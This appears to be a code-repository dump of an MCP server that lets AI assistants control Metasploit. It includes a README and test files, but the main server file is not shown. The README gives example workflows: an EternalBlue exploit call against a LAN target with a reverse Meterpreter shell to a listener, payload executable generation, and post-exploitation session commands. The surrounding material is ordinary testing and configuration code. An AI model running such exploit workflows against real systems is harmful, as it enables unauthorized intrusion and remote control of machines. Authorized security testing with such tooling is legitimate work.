# Directory Structure
```
├── .gitignore
├── conftest.py
├── LICENSE
├── Makefile
├── MetasploitMCP.py
├── pytest.ini
├── README.md
├── requirements-test.txt
├── requirements.txt
├── run_tests.py
└── tests
    ├── __init__.py
    ├── test_helpers.py
    ├── test_options_parsing.py
    └── test_tools_integration.py
```
# Files
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
```
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class

# Distribution / packaging
dist/
build/
*.egg-info/

# Virtual environments
venv/
env/
ENV/
.venv/

# IDE specific files
.idea/
.vscode/
*.swp
*.swo

# Logs
*.log

# Local configuration
.env
config.local.ini

# Windows specific
Thumbs.db
desktop.ini

# Python testing
.pytest_cache/
.coverage
htmlcov/
```
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
```markdown
1 | # Metasploit MCP Server
2 |
3 | A Model Context Protocol (MCP) server for Metasploit Framework integration.
4 |
5 |
6 | https://github.com/user-attachments/assets/39b19fb5-8397-4ccd-b896-d1797ec185e1
7 |
8 |
9 | ## Description
10 |
11 | This MCP server provides a bridge between large language models like Claude and the Metasploit Framework penetration testing platform. It allows AI assistants to dynamically access and control Metasploit functionality through standardized tools, enabling a natural language interface to complex security testing workflows.
12 |
13 | ## Features
14 |
15 | ### Module Information
16 |
17 | - **list_exploits**: Search and list available Metasploit exploit modules
18 | - **list_payloads**: Search and list available Metasploit payload modules with optional platform and architecture filtering
19 |
20 | ### Exploitation Workflow
21 |
22 | - **run_exploit**: Configure and execute an exploit against a target with options to run checks first
23 | - **run_auxiliary_module**: Run any Metasploit auxiliary module with custom options
24 | - **run_post_module**: Execute post-exploitation modules against existing sessions
25 |
26 | ### Payload Generation
27 |
28 | - **generate_payload**: Generate payload files using Metasploit RPC (saves files locally)
29 |
30 | ### Session Management
31 |
32 | - **list_active_sessions**: Show current Metasploit sessions with detailed information
33 | - **send_session_command**: Run a command in an active shell or Meterpreter session
34 | - **terminate_session**: Forcefully end an active session
35 |
36 | ### Handler Management
37 |
38 | - **list_listeners**: Show all active handlers and background jobs
39 | - **start_listener**: Create a new multi/handler to receive connections
40 | - **stop_job**: Terminate any running job or handler
41 |
42 | ## Prerequisites
43 |
44 | - Metasploit Framework installed and msfrpcd running
45 | - Python 3.10 or higher
46 | - Required Python packages (see requirements.txt)
47 |
48 | ## Installation
49 |
50 | 1. Clone this repository
51 | 2. Install dependencies:
52 | ```
53 | pip install -r requirements.txt
54 | ```
55 | 3. Configure environment variables (optional):
56 | ```
57 | MSF_PASSWORD=yourpassword
58 | MSF_SERVER=127.0.0.1
59 | MSF_PORT=55553
60 | MSF_SSL=false
61 | PAYLOAD_SAVE_DIR=/path/to/save/payloads # Optional: Where to save generated payloads
62 | ```
63 |
64 | ## Usage
65 |
66 | Start the Metasploit RPC service:
67 |
68 | ```bash
69 | msfrpcd -P yourpassword -S -a 127.0.0.1 -p 55553
70 | ```
71 |
72 | ### Transport Options
73 |
74 | The server supports two transport methods:
75 |
76 | - **HTTP/SSE (Server-Sent Events)**: Default mode for interoperability with most MCP clients
77 | - **STDIO (Standard Input/Output)**: Used with Claude Desktop and similar direct pipe connections
78 |
79 | You can explicitly select the transport mode using the `--transport` flag:
80 |
81 | ```bash
82 | # Run with HTTP/SSE transport (default)
83 | python MetasploitMCP.py --transport http
84 |
85 | # Run with STDIO transport
86 | python MetasploitMCP.py --transport stdio
87 | ```
88 |
89 | Additional options for HTTP mode:
90 | ```bash
91 | python MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085
92 | ```
93 |
94 | ### Claude Desktop Integration
95 |
96 | For Claude Desktop integration, configure `claude_desktop_config.json`:
97 |
98 | ```json
99 | {
100 |     "mcpServers": {
101 |         "metasploit": {
102 |             "command": "uv",
103 |             "args": [
104 |                 "--directory",
105 |                 "C:\\path\\to\\MetasploitMCP",
106 |                 "run",
107 |                 "MetasploitMCP.py",
108 |                 "--transport",
109 |                 "stdio"
110 |             ],
111 |             "env": {
112 |                 "MSF_PASSWORD": "yourpassword"
113 |             }
114 |         }
115 |     }
116 | }
117 | ```
118 |
119 | ### Other MCP Clients
120 |
121 | For other MCP clients that use HTTP/SSE:
122 |
123 | 1. Start the server in HTTP mode:
124 | ```bash
125 | python MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085
126 | ```
127 |
128 | 2. Configure your MCP client to connect to:
129 | - SSE endpoint: `http://your-server-ip:8085/sse`
130 |
131 | ## Security Considerations
132 |
133 | ⚠️ **IMPORTANT SECURITY WARNING**:
134 |
135 | This tool provides direct access to Metasploit Framework capabilities, which include powerful exploitation features. Use responsibly and only in environments where you have explicit permission to perform security testing.
136 |
137 | - Always validate and review all commands before execution
138 | - Only run in segregated test environments or with proper authorization
139 | - Be aware that post-exploitation commands can result in significant system modifications
140 |
141 | ## Example Workflows
142 |
143 | ### Basic Exploitation
144 |
145 | 1. List available exploits: `list_exploits("ms17_010")`
146 | 2. Select and run an exploit: `run_exploit("exploit/windows/smb/ms17_010_eternalblue", {"RHOSTS": "192.168.1.100"}, "windows/x64/meterpreter/reverse_tcp", {"LHOST": "192.168.1.10", "LPORT": 4444})`
147 | 3. List sessions: `list_active_sessions()`
148 | 4. Run commands: `send_session_command(1, "whoami")`
149 |
150 | ### Post-Exploitation
151 |
152 | 1. Run a post module: `run_post_module("windows/gather/enum_logged_on_users", 1)`
153 | 2. Send custom commands: `send_session_command(1, "sysinfo")`
154 | 3. Terminate when done: `terminate_session(1)`
155 |
156 | ### Handler Management
157 |
158 | 1. Start a listener: `start_listener("windows/meterpreter/reverse_tcp", "192.168.1.10", 4444)`
159 | 2. List active handlers: `list_listeners()`
160 | 3. Generate a payload: `generate_payload("windows/meterpreter/reverse_tcp", "exe", {"LHOST": "192.168.1.10", "LPORT": 4444})`
161 | 4. Stop a handler: `stop_job(1)`
162 |
163 | ## Testing
164 |
165 | This project includes comprehensive unit and integration tests to ensure reliability and maintainability.
166 |
167 | ### Prerequisites for Testing
168 |
169 | Install test dependencies:
170 |
171 | ```bash
172 | pip install -r requirements-test.txt
173 | ```
174 |
175 | Or use the convenient installer:
176 |
177 | ```bash
178 | python run_tests.py --install-deps
179 | # OR
180 | make install-deps
181 | ```
182 |
183 | ### Running Tests
184 |
185 | #### Quick Commands
186 |
187 | ```bash
188 | # Run all tests
189 | python run_tests.py --all
190 | # OR
191 | make test
192 |
193 | # Run with coverage report
194 | python run_tests.py --all --coverage
195 | # OR
196 | make coverage
197 |
198 | # Run with HTML coverage report
199 | python run_tests.py --all --coverage --html
200 | # OR
201 | make coverage-html
202 | ```
203 |
204 | #### Specific Test Suites
205 |
206 | ```bash
207 | # Unit tests only
208 | python run_tests.py --unit
209 | # OR
210 | make test-unit
211 |
212 | # Integration tests only
213 | python run_tests.py --integration
214 | # OR
215 | make test-integration
216 |
217 | # Options parsing tests
218 | python run_tests.py --options
219 | # OR
220 | make test-options
221 |
222 | # Helper function tests
223 | python run_tests.py --helpers
224 | # OR
225 | make test-helpers
226 |
227 | # MCP tools tests
228 | python run_tests.py --tools
229 | # OR
230 | make test-tools
231 | ```
232 |
233 | #### Test Options
234 |
235 | ```bash
236 | # Include slow tests
237 | python run_tests.py --all --slow
238 |
239 | # Include network tests (requires actual network)
240 | python run_tests.py --all --network
241 |
242 | # Verbose output
243 | python run_tests.py --all --verbose
244 |
245 | # Quick test (no coverage, fail fast)
246 | make quick-test
247 |
248 | # Debug mode (detailed failure info)
249 | make test-debug
250 | ```
251 |
252 | ### Test Structure
253 |
254 | - **`tests/test_options_parsing.py`**: Unit tests for the graceful options parsing functionality
255 | - **`tests/test_helpers.py`**: Unit tests for internal helper functions and MSF client management
256 | - **`tests/test_tools_integration.py`**: Integration tests for all MCP tools with mocked Metasploit backend
257 | - **`conftest.py`**: Shared test fixtures and configuration
258 | - **`pytest.ini`**: Pytest configuration with coverage settings
259 |
260 | ### Test Features
261 |
262 | - **Comprehensive Mocking**: All Metasploit dependencies are mocked, so tests run without requiring an actual MSF installation
263 | - **Async Support**: Full async/await testing support using pytest-asyncio
264 | - **Coverage Reporting**: Detailed coverage analysis with HTML reports
265 | - **Parametrized Tests**: Efficient testing of multiple input scenarios
266 | - **Fixture Management**: Reusable test fixtures for common setup scenarios
267 |
268 | ### Coverage Reports
269 |
270 | After running tests with coverage, reports are available in:
271 |
272 | - **Terminal**: Coverage summary displayed after test run
273 | - **HTML**: `htmlcov/index.html` (when using `--html` option)
274 |
275 | ### CI/CD Integration
276 |
277 | For continuous integration:
278 |
279 | ```bash
280 | # CI-friendly test command
281 | make ci-test
282 | # OR
283 | python run_tests.py --all --coverage --verbose
284 | ```
285 |
286 | ## Configuration Options
287 |
288 | ### Payload Save Directory
289 |
290 | By default, payloads generated with `generate_payload` are saved to a `payloads` directory in your home folder (`~/payloads` or `C:\Users\YourUsername\payloads`). You can customize this location by setting the `PAYLOAD_SAVE_DIR` environment variable.
291 |
292 | **Setting the environment variable:**
293 |
294 | - **Windows (PowerShell)**:
295 | ```powershell
296 | $env:PAYLOAD_SAVE_DIR = "C:\custom\path\to\payloads"
297 | ```
298 |
299 | - **Windows (Command Prompt)**:
300 | ```cmd
301 | set PAYLOAD_SAVE_DIR=C:\custom\path\to\payloads
302 | ```
303 |
304 | - **Linux/macOS**:
305 | ```bash
306 | export PAYLOAD_SAVE_DIR=/custom/path/to/payloads
307 | ```
308 |
309 | - **In Claude Desktop config** (add `PAYLOAD_SAVE_DIR` only if you want to override the default):
310 | ```json
311 | "env": {
312 |     "MSF_PASSWORD": "yourpassword",
313 |     "PAYLOAD_SAVE_DIR": "C:\\your\\actual\\path\\to\\payloads"
314 | }
315 | ```
316 |
317 | **Note:** If you specify a custom path, make sure it exists or the application has permission to create it. If the path is invalid, payload generation might fail.
318 |
319 | ## License
320 |
321 | Apache 2.0
322 |
```
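The README lists five environment variables but does not show how they are consumed. The following is a minimal sketch of one way to read them, assuming the defaults shown in the README examples (`127.0.0.1`, `55553`, SSL off, `~/payloads`). The `MsfSettings` class and `load_settings` function are hypothetical names used only for illustration; they are not taken from `MetasploitMCP.py`.

```python
import os
from dataclasses import dataclass
from pathlib import Path
from typing import Mapping, Optional


@dataclass(frozen=True)
class MsfSettings:
    """Hypothetical container for the variables named in the README."""
    password: str
    server: str
    port: int
    ssl: bool
    payload_save_dir: Path


def load_settings(env: Optional[Mapping[str, str]] = None) -> MsfSettings:
    """Read MSF_* variables from a mapping (defaults to os.environ)."""
    env = os.environ if env is None else env
    # Treat "true"/"1"/"yes" (any case) as enabled; anything else is off.
    ssl_enabled = env.get("MSF_SSL", "false").strip().lower() in ("true", "1", "yes")
    # Fall back to ~/payloads, the default location described in the README.
    save_dir = env.get("PAYLOAD_SAVE_DIR") or str(Path.home() / "payloads")
    return MsfSettings(
        password=env.get("MSF_PASSWORD", "yourpassword"),  # README placeholder value
        server=env.get("MSF_SERVER", "127.0.0.1"),
        port=int(env.get("MSF_PORT", "55553")),
        ssl=ssl_enabled,
        payload_save_dir=Path(save_dir),
    )


if __name__ == "__main__":
    print(load_settings())
```

Passing a plain dictionary instead of relying on `os.environ` keeps the function easy to test without touching the real process environment.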
--------------------------------------------------------------------------------
/tests/__init__.py:
--------------------------------------------------------------------------------
```python
# Test package for MetasploitMCP
```
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
```
fastapi>=0.95.0
uvicorn[standard]>=0.22.0
pymetasploit3>=1.0.6
mcp>=1.6.0
fastmcp>=2.10.3
```
--------------------------------------------------------------------------------
/requirements-test.txt:
--------------------------------------------------------------------------------
```
# Testing dependencies for MetasploitMCP
pytest>=7.0.0
pytest-asyncio>=0.21.0
pytest-mock>=3.10.0
pytest-cov>=4.0.0
mock>=4.0.3
```
--------------------------------------------------------------------------------
/pytest.ini:
--------------------------------------------------------------------------------
```
# The section must be [pytest] in pytest.ini; [tool:pytest] is only read from setup.cfg.
[pytest]
# Pytest configuration for MetasploitMCP

# Test discovery
testpaths = tests
python_files = test_*.py
python_classes = Test*
python_functions = test_*

# Output and reporting
addopts =
    -v
    --tb=short
    --strict-markers
    --disable-warnings
    --cov=MetasploitMCP
    --cov-report=term-missing
    --cov-report=html:htmlcov
    --cov-fail-under=80

# Async test support
asyncio_mode = auto

# Markers
markers =
    unit: Unit tests for individual functions
    integration: Integration tests for full workflows
    slow: Tests that take longer to run
    network: Tests that require network access (disabled by default)

# Minimum version
minversion = 7.0

# Filter warnings
filterwarnings =
    ignore::DeprecationWarning
    ignore::PendingDeprecationWarning
    ignore:.*unclosed.*:ResourceWarning
```
--------------------------------------------------------------------------------
/run_tests.py:
--------------------------------------------------------------------------------
```python
#!/usr/bin/env python3
"""
Test runner script for MetasploitMCP.
Provides convenient commands for running different test suites.
"""

import sys
import os
import argparse
import subprocess
from pathlib import Path

def run_command(cmd, description=""):
    """Run a command and handle errors."""
    if description:
        print(f"\n🔄 {description}")
    print(f"Running: {' '.join(cmd)}")

    try:
        result = subprocess.run(cmd, check=True, capture_output=True, text=True)
        print("✅ Success!")
        if result.stdout:
            print(result.stdout)
        return True
    except subprocess.CalledProcessError as e:
        print(f"❌ Failed with exit code {e.returncode}")
        if e.stdout:
            print("STDOUT:", e.stdout)
        if e.stderr:
            print("STDERR:", e.stderr)
        return False

def check_dependencies():
    """Check if test dependencies are installed."""
    try:
        import pytest
        import pytest_asyncio
        import pytest_mock
        import pytest_cov
        return True
    except ImportError as e:
        print(f"❌ Missing test dependency: {e}")
        print("💡 Install test dependencies with: pip install -r requirements-test.txt")
        return False

def main():
    parser = argparse.ArgumentParser(description="MetasploitMCP Test Runner")
    parser.add_argument("--all", action="store_true", help="Run all tests")
    parser.add_argument("--unit", action="store_true", help="Run unit tests only")
    parser.add_argument("--integration", action="store_true", help="Run integration tests only")
    parser.add_argument("--options", action="store_true", help="Run options parsing tests only")
    parser.add_argument("--helpers", action="store_true", help="Run helper function tests only")
    parser.add_argument("--tools", action="store_true", help="Run MCP tools tests only")
    parser.add_argument("--coverage", action="store_true", help="Generate coverage report")
    parser.add_argument("--html", action="store_true", help="Generate HTML coverage report")
    parser.add_argument("--slow", action="store_true", help="Include slow tests")
    parser.add_argument("--network", action="store_true", help="Include network tests")
    parser.add_argument("--verbose", "-v", action="store_true", help="Verbose output")
    parser.add_argument("--install-deps", action="store_true", help="Install test dependencies")

    args = parser.parse_args()

    # Handle dependency installation
    if args.install_deps:
        return run_command([
            sys.executable, "-m", "pip", "install", "-r", "requirements-test.txt"
        ], "Installing test dependencies")

    # Check dependencies
    if not check_dependencies():
        return False

    # Build pytest command
    cmd = [sys.executable, "-m", "pytest"]

    # Add verbosity
    if args.verbose:
        cmd.append("-v")

    # Add coverage options
    if args.coverage or args.html:
        cmd.extend(["--cov=MetasploitMCP", "--cov-report=term-missing"])
        if args.html:
            cmd.append("--cov-report=html:htmlcov")

    # Add slow/network test options
    if args.slow:
        cmd.append("--run-slow")
    if args.network:
        cmd.append("--run-network")

    # Determine which tests to run
    if args.options:
        cmd.append("tests/test_options_parsing.py")
        description = "Running options parsing tests"
    elif args.helpers:
        cmd.append("tests/test_helpers.py")
        description = "Running helper function tests"
    elif args.tools:
        cmd.append("tests/test_tools_integration.py")
        description = "Running MCP tools integration tests"
    elif args.unit:
        cmd.extend(["-m", "unit"])
        description = "Running unit tests"
    elif args.integration:
        cmd.extend(["-m", "integration"])
        description = "Running integration tests"
    elif args.all:
        cmd.append("tests/")
        description = "Running all tests"
    else:
        # Default: run all tests
        cmd.append("tests/")
        description = "Running all tests (default)"

    # Run the tests
    success = run_command(cmd, description)

    if success and (args.coverage or args.html):
        print("\n📊 Coverage report generated")
        if args.html:
            html_path = Path("htmlcov/index.html").resolve()
            print(f"📄 HTML report: file://{html_path}")

    return success

if __name__ == "__main__":
    success = main()
    sys.exit(0 if success else 1)
```
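The flag-to-command mapping in `run_tests.py` can be isolated into a pure function, which makes the precedence of the suite selectors easier to see and to test. This is only a sketch: `build_pytest_cmd` and its `suite`/`python` parameters are hypothetical names introduced here, and the `--slow`/`--network` switches are left out for brevity.

```python
import sys
from typing import Dict, List, Optional

# Suite name -> pytest arguments, mirroring the if/elif chain in run_tests.py.
SUITE_TARGETS: Dict[str, List[str]] = {
    "options": ["tests/test_options_parsing.py"],
    "helpers": ["tests/test_helpers.py"],
    "tools": ["tests/test_tools_integration.py"],
    "unit": ["-m", "unit"],
    "integration": ["-m", "integration"],
    "all": ["tests/"],
}


def build_pytest_cmd(
    suite: str = "all",
    coverage: bool = False,
    html: bool = False,
    verbose: bool = False,
    python: Optional[str] = None,
) -> List[str]:
    """Return the pytest argv for a suite; unknown suites fall back to 'all'."""
    cmd = [python or sys.executable, "-m", "pytest"]
    if verbose:
        cmd.append("-v")
    if coverage or html:
        cmd += ["--cov=MetasploitMCP", "--cov-report=term-missing"]
    if html:
        cmd.append("--cov-report=html:htmlcov")
    cmd += SUITE_TARGETS.get(suite, SUITE_TARGETS["all"])
    return cmd


if __name__ == "__main__":
    print(" ".join(build_pytest_cmd("unit", coverage=True)))
```

Because the function only builds a list, it can be checked without spawning a subprocess.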
--------------------------------------------------------------------------------
/conftest.py:
--------------------------------------------------------------------------------
```python
#!/usr/bin/env python3
"""
Pytest configuration and shared fixtures for MetasploitMCP tests.
"""

import pytest
import sys
import os
from unittest.mock import Mock, patch

# Add the project root to Python path
sys.path.insert(0, os.path.dirname(__file__))

def pytest_configure(config):
    """Configure pytest with custom settings."""
    # Mock external dependencies that might not be available
    mock_modules = [
        'uvicorn',
        'fastapi',
        'mcp.server.fastmcp',
        'mcp.server.sse',
        'pymetasploit3.msfrpc',
        'starlette.applications',
        'starlette.routing',
        'mcp.server.session'
    ]

    for module in mock_modules:
        if module not in sys.modules:
            sys.modules[module] = Mock()

def pytest_collection_modifyitems(config, items):
    """Modify test collection to add markers automatically."""
    for item in items:
        # Add unit marker to test_options_parsing and test_helpers
        if "test_options_parsing" in item.nodeid or "test_helpers" in item.nodeid:
            item.add_marker(pytest.mark.unit)

        # Add integration marker to integration tests
        if "test_tools_integration" in item.nodeid:
            item.add_marker(pytest.mark.integration)

        # Mark network tests
        if "network" in item.name.lower():
            item.add_marker(pytest.mark.network)

        # Mark slow tests
        if any(keyword in item.name.lower() for keyword in ["slow", "timeout", "long"]):
            item.add_marker(pytest.mark.slow)

@pytest.fixture(scope="session")
def mock_msf_environment():
    """Session-scoped fixture that provides a complete mock MSF environment."""

    class MockMsfRpcClient:
        def __init__(self):
            self.modules = Mock()
            self.core = Mock()
            self.sessions = Mock()
            self.jobs = Mock()
            self.consoles = Mock()

            # Default return values
            self.core.version = {'version': '6.3.0'}
            self.modules.exploits = []
            self.modules.payloads = []
            self.sessions.list.return_value = {}
            self.jobs.list.return_value = {}

    class MockMsfConsole:
        def __init__(self, cid='test-console'):
            self.cid = cid

        def read(self):
            return {'data': '', 'prompt': 'msf6 > ', 'busy': False}

        def write(self, command):
            return True

    class MockMsfRpcError(Exception):
        pass

    # Apply mocks
    with patch.dict('sys.modules', {
        'pymetasploit3.msfrpc': Mock(
            MsfRpcClient=MockMsfRpcClient,
            MsfConsole=MockMsfConsole,
            MsfRpcError=MockMsfRpcError
        )
    }):
        yield {
            'client_class': MockMsfRpcClient,
            'console_class': MockMsfConsole,
            'error_class': MockMsfRpcError
        }

@pytest.fixture
def mock_logger():
    """Fixture providing a mock logger."""
    with patch('MetasploitMCP.logger') as mock_log:
        yield mock_log

@pytest.fixture
def temp_payload_dir(tmp_path):
    """Fixture providing a temporary directory for payload saves."""
    payload_dir = tmp_path / "payloads"
    payload_dir.mkdir()

    with patch('MetasploitMCP.PAYLOAD_SAVE_DIR', str(payload_dir)):
        yield str(payload_dir)

@pytest.fixture
def mock_asyncio_to_thread():
    """Fixture to mock asyncio.to_thread for testing."""
    async def mock_to_thread(func, *args, **kwargs):
        return func(*args, **kwargs)

    with patch('asyncio.to_thread', side_effect=mock_to_thread):
        yield

@pytest.fixture
def capture_logs(caplog):
    """Fixture to capture and provide log output."""
    import logging
    caplog.set_level(logging.DEBUG)
    return caplog

# Command line options
def pytest_addoption(parser):
    """Add custom command line options."""
    parser.addoption(
        "--run-slow",
        action="store_true",
        default=False,
        help="Run slow tests"
    )
    parser.addoption(
        "--run-network",
        action="store_true",
        default=False,
        help="Run tests that require network access"
    )

def pytest_runtest_setup(item):
    """Setup hook to skip tests based on markers and options."""
    if "slow" in item.keywords and not item.config.getoption("--run-slow"):
        pytest.skip("Skipping slow test (use --run-slow to run)")

    if "network" in item.keywords and not item.config.getoption("--run-network"):
        pytest.skip("Skipping network test (use --run-network to run)")

# Test environment setup
@pytest.fixture(autouse=True)
def reset_msf_client():
    """Automatically reset the global MSF client between tests."""
    with patch('MetasploitMCP._msf_client_instance', None):
        yield
```
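The auto-marking and skip rules in `conftest.py` are driven purely by substring matches on the test's node ID and name. The sketch below restates those rules as two standalone functions so their effect can be checked without running pytest. `markers_for` and `should_skip` are hypothetical helper names, not part of the repository.

```python
from typing import Iterable, Set

# Keywords that cause a test to be marked "slow", as in conftest.py.
SLOW_KEYWORDS = ("slow", "timeout", "long")


def markers_for(nodeid: str, name: str) -> Set[str]:
    """Return the marker names conftest.py would attach to a collected test."""
    markers: Set[str] = set()
    if "test_options_parsing" in nodeid or "test_helpers" in nodeid:
        markers.add("unit")
    if "test_tools_integration" in nodeid:
        markers.add("integration")
    lowered = name.lower()
    if "network" in lowered:
        markers.add("network")
    if any(keyword in lowered for keyword in SLOW_KEYWORDS):
        markers.add("slow")
    return markers


def should_skip(markers: Iterable[str], run_slow: bool = False, run_network: bool = False) -> bool:
    """Mirror pytest_runtest_setup: skip slow/network tests unless opted in."""
    marker_set = set(markers)
    if "slow" in marker_set and not run_slow:
        return True
    if "network" in marker_set and not run_network:
        return True
    return False


if __name__ == "__main__":
    found = markers_for("tests/test_helpers.py::test_connect_timeout", "test_connect_timeout")
    print(sorted(found), should_skip(found))
```

One consequence of substring matching is that any test whose name merely contains `long` or `timeout` (for example, a hypothetical `test_long_option_name`) is treated as slow and skipped unless `--run-slow` is passed.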
--------------------------------------------------------------------------------
/tests/test_options_parsing.py:
--------------------------------------------------------------------------------
```python
#!/usr/bin/env python3
"""
Unit tests for the options parsing functionality in MetasploitMCP.
"""

import pytest
import sys
import os
from unittest.mock import Mock, patch
from typing import Dict, Any, Union

# Add the parent directory to the path to import MetasploitMCP
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))

# Mock the dependencies that aren't available in test environment
sys.modules['uvicorn'] = Mock()
sys.modules['fastapi'] = Mock()
sys.modules['mcp.server.fastmcp'] = Mock()
sys.modules['mcp.server.sse'] = Mock()
sys.modules['pymetasploit3.msfrpc'] = Mock()
sys.modules['starlette.applications'] = Mock()
sys.modules['starlette.routing'] = Mock()
sys.modules['mcp.server.session'] = Mock()

# Import the function we want to test
from MetasploitMCP import _parse_options_gracefully


class TestParseOptionsGracefully:
    """Test cases for the _parse_options_gracefully function."""

    def test_dict_format_passthrough(self):
        """Test that dictionary format is passed through unchanged."""
        input_dict = {"LHOST": "192.168.1.100", "LPORT": 4444}
        result = _parse_options_gracefully(input_dict)
        assert result == input_dict
        assert result is input_dict  # Should be the same object

    def test_none_returns_empty_dict(self):
        """Test that None input returns empty dictionary."""
        result = _parse_options_gracefully(None)
        assert result == {}
        assert isinstance(result, dict)

    def test_empty_string_returns_empty_dict(self):
        """Test that empty string returns empty dictionary."""
        result = _parse_options_gracefully("")
        assert result == {}

        result = _parse_options_gracefully(" ")
        assert result == {}

    def test_empty_dict_returns_empty_dict(self):
        """Test that empty dictionary returns empty dictionary."""
        result = _parse_options_gracefully({})
        assert result == {}

    def test_simple_string_format(self):
        """Test basic string format parsing."""
        input_str = "LHOST=192.168.1.100,LPORT=4444"
        expected = {"LHOST": "192.168.1.100", "LPORT": 4444}
        result = _parse_options_gracefully(input_str)
        assert result == expected

    def test_string_format_with_spaces(self):
        """Test string format with extra spaces."""
        input_str = " LHOST = 192.168.1.100 , LPORT = 4444 "
        expected = {"LHOST": "192.168.1.100", "LPORT": 4444}
        result = _parse_options_gracefully(input_str)
        assert result == expected

    def test_string_format_with_quotes(self):
        """Test string format with quoted values."""
        input_str = 'LHOST="192.168.1.100",LPORT="4444"'
        expected = {"LHOST": "192.168.1.100", "LPORT": 4444}
        result = _parse_options_gracefully(input_str)
        assert result == expected

        input_str = "LHOST='192.168.1.100',LPORT='4444'"
        result = _parse_options_gracefully(input_str)
        assert result == expected

    def test_boolean_conversion(self):
        """Test boolean value conversion."""
        input_str = "ExitOnSession=true,Verbose=false,Debug=TRUE,Silent=FALSE"
        expected = {
            "ExitOnSession": True,
            "Verbose": False,
            "Debug": True,
            "Silent": False
        }
        result = _parse_options_gracefully(input_str)
        assert result == expected

    def test_numeric_conversion(self):
        """Test numeric value conversion."""
        input_str = "LPORT=4444,Timeout=30,Retries=5"
        expected = {"LPORT": 4444, "Timeout": 30, "Retries": 5}
        result = _parse_options_gracefully(input_str)
        assert result == expected

    def test_mixed_types(self):
        """Test parsing with mixed value types."""
        input_str = "LHOST=192.168.1.100,LPORT=4444,SSL=true,Retries=3"
        expected = {
            "LHOST": "192.168.1.100",
            "LPORT": 4444,
            "SSL": True,
            "Retries": 3
        }
        result = _parse_options_gracefully(input_str)
        assert result == expected

    def test_equals_in_value(self):
        """Test parsing when value contains equals sign."""
        input_str = "LURI=/test=value,LHOST=192.168.1.1"
        expected = {"LURI": "/test=value", "LHOST": "192.168.1.1"}
        result = _parse_options_gracefully(input_str)
        assert result == expected

    def test_complex_values(self):
        """Test parsing complex values like file paths and URLs."""
        input_str = "CertFile=/path/to/cert.pem,URL=https://example.com:8443/api,Command=ls -la"
        expected = {
            "CertFile": "/path/to/cert.pem",
            "URL": "https://example.com:8443/api",
            "Command": "ls -la"
        }
        result = _parse_options_gracefully(input_str)
        assert result == expected

    def test_single_option(self):
        """Test parsing single option."""
        input_str = "LHOST=192.168.1.100"
        expected = {"LHOST": "192.168.1.100"}
        result = _parse_options_gracefully(input_str)
        assert result == expected

    def test_error_missing_equals(self):
        """Test error handling for missing equals sign."""
        with pytest.raises(ValueError, match="missing '='"):
            _parse_options_gracefully("LHOST192.168.1.100")

        with pytest.raises(ValueError, match="missing '='"):
            _parse_options_gracefully("LHOST=192.168.1.100,LPORT4444")

    def test_error_empty_key(self):
        """Test error handling for empty key."""
        with pytest.raises(ValueError, match="empty key"):
            _parse_options_gracefully("=value")

        with pytest.raises(ValueError, match="empty key"):
            _parse_options_gracefully("LHOST=192.168.1.100,=4444")

    def test_error_invalid_type(self):
        """Test error handling for invalid input types."""
        with pytest.raises(ValueError, match="Options must be a dictionary"):
            _parse_options_gracefully(123)

        with pytest.raises(ValueError, match="Options must be a dictionary"):
            _parse_options_gracefully([1, 2, 3])

    def test_whitespace_handling(self):
        """Test various whitespace scenarios."""
        # Leading/trailing spaces in whole string
        result = _parse_options_gracefully(" LHOST=192.168.1.100,LPORT=4444 ")
        expected = {"LHOST": "192.168.1.100", "LPORT": 4444}
        assert result == expected

        # Spaces around commas
        result = _parse_options_gracefully("LHOST=192.168.1.100 , LPORT=4444")
        assert result == expected

        # Multiple spaces
        result = _parse_options_gracefully("LHOST=192.168.1.100,  LPORT=4444")
        assert result == expected

    def test_edge_case_empty_value(self):
        """Test handling of empty values."""
        input_str = "LHOST=192.168.1.100,EmptyValue="
        expected = {"LHOST": "192.168.1.100", "EmptyValue": ""}
        result = _parse_options_gracefully(input_str)
        assert result == expected

    def test_quoted_empty_value(self):
        """Test handling of quoted empty values."""
        input_str = 'LHOST=192.168.1.100,EmptyValue=""'
        expected = {"LHOST": "192.168.1.100", "EmptyValue": ""}
        result = _parse_options_gracefully(input_str)
        assert result == expected

    def test_special_characters_in_values(self):
        """Test handling of special characters in values."""
        input_str = "Password=p@ssw0rd!,Path=/home/user/file.txt,Regex=\\d+"
        expected = {
            "Password": "p@ssw0rd!",
            "Path": "/home/user/file.txt",
            "Regex": "\\d+"
        }
        result = _parse_options_gracefully(input_str)
        assert result == expected

    @pytest.mark.parametrize("input_val,expected", [
        # Basic cases
        ({"key": "value"}, {"key": "value"}),
        ("key=value", {"key": "value"}),
        (None, {}),
        ("", {}),

        # Type conversions
        ("port=8080", {"port": 8080}),
        ("enabled=true", {"enabled": True}),
        ("disabled=false", {"disabled": False}),

        # Complex cases
        ("a=1,b=true,c=text", {"a": 1, "b": True, "c": "text"}),
    ])
    def test_parametrized_cases(self, input_val, expected):
        """Parametrized test cases for various inputs."""
        result = _parse_options_gracefully(input_val)
        assert result == expected

    def test_large_number_handling(self):
        """Test handling of large numbers that might not fit in int."""
        # Python can handle very large integers, so use a string that definitely isn't a number
        mixed_num = "999999999999999999999abc"
        input_str = f"BigNumber={mixed_num}"
        result = _parse_options_gracefully(input_str)
        # The function tries int conversion but falls back to string on error
        assert result["BigNumber"] == mixed_num
        assert isinstance(result["BigNumber"], str)

    def test_logging_behavior(self):
        """Test that logging occurs during string conversion."""
        with patch('MetasploitMCP.logger') as mock_logger:
            _parse_options_gracefully("LHOST=192.168.1.100,LPORT=4444")
            # Should log the conversion
            assert mock_logger.info.call_count >= 1

            # Should contain conversion messages
            call_args = [call[0][0] for call in mock_logger.info.call_args_list]
            assert any("Converting string format" in msg for msg in call_args)
            assert any("Successfully converted" in msg for msg in call_args)


if __name__ == "__main__":
    pytest.main([__file__, "-v"])
```
